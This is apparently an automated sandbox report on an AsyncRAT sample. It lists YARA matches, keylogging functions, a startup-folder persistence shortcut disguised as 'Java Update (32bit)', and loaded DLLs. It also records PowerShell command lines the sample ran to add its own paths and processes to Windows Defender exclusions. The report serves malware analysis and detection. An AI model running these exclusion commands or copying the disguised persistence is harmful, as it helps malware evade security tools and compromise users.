Source: powershell.exe, 00000004.00000002.1810793540.0000020C89955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwpkiops/Docs/Repository.htm0
Source: powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2194033435.0000024B2E830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000001.00000002.1761890443.0000023A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811776017.0000020C899E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1906005748.0000019580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2054973292.0000024B16131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1782938063.0000023A760B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.m
Source: powershell.exe, 00000001.00000002.1775096450.0000023A10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860716635.0000020C99A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1981436782.0000019590074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 03VPFXH490.exe, type: SAMPLE
Source: Yara match	File source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 03VPFXH490.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED

Contains functionality to log keystrokes (.Net Source)

Source: 03VPFXH490.exe, XLogger.cs	.Net Code: KeyboardLayout
Source: Java Update (32bit).exe.0.dr, XLogger.cs	.Net Code: KeyboardLayout

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\03VPFXH490.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 03VPFXH490.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\03VPFXH490.exe	Code function: 0_2_00007FFD9BAD1771	0_2_00007FFD9BAD1771
Source: C:\Users\user\Desktop\03VPFXH490.exe	Code function: 0_2_00007FFD9BAD6662	0_2_00007FFD9BAD6662
Source: C:\Users\user\Desktop\03VPFXH490.exe	Code function: 0_2_00007FFD9BAD0610	0_2_00007FFD9BAD0610
Source: C:\Users\user\Desktop\03VPFXH490.exe	Code function: 0_2_00007FFD9BAD58B6	0_2_00007FFD9BAD58B6
Source: C:\Users\user\Desktop\03VPFXH490.exe	Code function: 0_2_00007FFD9BAD9420	0_2_00007FFD9BAD9420
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9BB82E11	1_2_00007FFD9BB82E11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BB630E9	7_2_00007FFD9BB630E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9BB82E1C	11_2_00007FFD9BB82E1C

Source: 03VPFXH490.exe, 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamex.exe4 vs 03VPFXH490.exe
Source: 03VPFXH490.exe	Binary or memory string: OriginalFilenamex.exe4 vs 03VPFXH490.exe

Source: 03VPFXH490.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 03VPFXH490.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 03VPFXH490.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 03VPFXH490.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 03VPFXH490.exe, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update (32bit).exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update (32bit).exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update (32bit).exe.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 03VPFXH490.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 03VPFXH490.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Java Update (32bit).exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Java Update (32bit).exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/20@1/2

Source: C:\Users\user\Desktop\03VPFXH490.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Users\user\Desktop\03VPFXH490.exe	Mutant created: \Sessions\1\BaseNamedObjects\2XLzSYLZvUJjDK3V
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03

Source: C:\Users\user\Desktop\03VPFXH490.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: 03VPFXH490.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 03VPFXH490.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\03VPFXH490.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\03VPFXH490.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 03VPFXH490.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\03VPFXH490.exe

File read: C:\Users\user\Desktop\03VPFXH490.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\03VPFXH490.exe "C:\Users\user\Desktop\03VPFXH490.exe"
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '03VPFXH490.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe'	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '03VPFXH490.exe'	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'	Jump to behavior

Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
